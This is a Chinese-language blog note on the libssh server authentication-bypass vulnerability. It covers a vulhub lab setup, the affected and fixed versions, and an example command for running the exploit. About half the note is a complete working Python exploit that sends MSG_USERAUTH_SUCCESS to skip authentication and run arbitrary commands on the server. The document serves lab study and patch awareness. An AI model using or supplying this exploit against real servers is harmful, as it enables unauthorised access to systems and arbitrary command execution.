libssh 服务端权限认证绕过漏洞
- 2019 年 10 月 7 日
- 筆記
libssh是一个提供ssh相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标SSH服务器。
在vulhub上开启环境,端口是2222,我们可以使用账号密码:myuser:mypassword),连接,这是一个合法的ssh流程。
启动环境:
docker-compose up -d
漏洞poc参考seebug上给出的poc,
链接是:https://www.seebug.org/vuldb/ssvid-97614
修改之后,可以直接执行任意命令。exp利用方式如下:
利用命令: python3 libsshexp.py 172.16.1.33 2222 "whoami"

攻击者成功利用此漏洞,可登入目标服务器进一步进行任意恶意操作。
另外值得说明的是,OpenSSH 与 libssh 是两个独立的项目,并且 OpenSSH 官方安全团队目前也尚未发布任何与此漏洞相关的信息,故 OpenSSH 应该不受此漏洞影响。
影响范围
libssh 0.8.x – 0.8.3
libssh 0.7.x – 0.7.5
libssh 0.6.x
解决方案
libssh 0.8.x 版本请升级到 0.8.4
libssh 0.7.x 版本请升级到 0.7.6
附上漏洞利用代码:
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048
def execute(hostname, port, command):
sock = socket.socket()
try:
sock.connect((hostname, int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
client = transport.open_session(timeout=10)
client.exec_command(command)
# stdin = client.makefile("wb", bufsize)
stdout = client.makefile("rb", bufsize)
stderr = client.makefile_stderr("rb", bufsize)
output = stdout.read()
error = stderr.read()
stdout.close()
stderr.close()
return (output+error).decode()
except paramiko.SSHException as e:
logging.exception(e)
logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
except socket.error:
logging.debug("Unable to connect.")
return None
if __name__ == '__main__':
print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))